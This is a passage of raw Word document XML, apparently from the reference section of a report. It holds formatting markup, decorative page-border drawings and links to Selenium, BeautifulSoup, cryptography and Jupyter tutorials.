        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6FD52529" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF8875" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId158">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>https://www.selenium.dev/docs</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId159">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId160">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>https://www.crummy.com/software/BeautifulSoup/bs4/doc/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId161">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId162">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/cryptography/index.htm</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId163">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId164">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>https://www.dataquest.io/blog/jupyter</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId165">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId166">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>notebook</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId167">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId168">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>tutorial/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId169">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:color w:val="6F2F9F"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId170">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=JmiUyPCkZ2Y</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId171">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="6F2F9F"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId172">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=KTxsBW9SkOU</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId173">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="6F2F9F"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C22E65F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC7346" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251746304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06FE06D8" wp14:editId="5A59456A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44311" name="Group 44311"/>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20" name="Shape 5022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21" name="Shape 5022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22" name="Shape 5022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23" name="Shape 5022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24" name="Shape 5022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11" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50225" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50226" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50227" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50228" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50229" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,993648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7328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DC8CF26" wp14:editId="0BBF9DE7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44312" name="Group 4431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30" name="Shape 5023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1" name="Shape 5023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32" name="Shape 5023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3" name="Shape 5023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34" name="Shape 5023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12" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50235" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50236" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50237" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50238" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5023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rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F1713" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F51B26" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F8C8B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5FA78F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FABE48E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706BD9A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488B83F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C114318" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D47D372" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787B38D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFFADE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647FDE6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E445EE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5BB273" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9AA56" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6886CD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34082D22" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B82FD8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1037AE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:sectPr w:rsidR="00F97B52">
          <w:headerReference w:type="even" r:id="rId174"/>
          <w:headerReference w:type="default" r:id="rId175"/>
          <w:footerReference w:type="even" r:id="rId176"/>
          <w:footerReference w:type="default" r:id="rId177"/>
          <w:headerReference w:type="first" r:id="rId178"/>
          <w:footerReference w:type="first" r:id="rId179"/>
          <w:pgSz w:w="11911" w:h="16841"/>
          <w:pgMar w:top="539" w:right="1325" w:bottom="536" w:left="1340" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4234C941" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19A18B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="553"/>
        <w:ind w:left="87"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38575705" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14327"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251748352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51196A21" wp14:editId="57094B34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="43557" name="Group 43557"/>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40" name="Shape 50240"/>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41" name="Shape 50241"/>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42" name="Shape 5024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43" name="Shape 50243"/>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44" name="Shape 50244"/>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57" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50245" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50246" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50247" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50248" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50249" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480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49376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A96F437" wp14:editId="2C23B228">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43562" name="Group 43562"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="74676" cy="9936480"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="74676" cy="9936480"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="50250" name="Shape 50250"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="65532"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51" name="Shape 50251"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="56388"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52" name="Shape 50252"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="18288" y="0"/>
                            <a:ext cx="38100" cy="9936480"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="38100" h="9936480">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="38100" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38100"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53" name="Shape 50253"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="9144"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54" name="Shape 50254"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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62" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50255" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50256" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
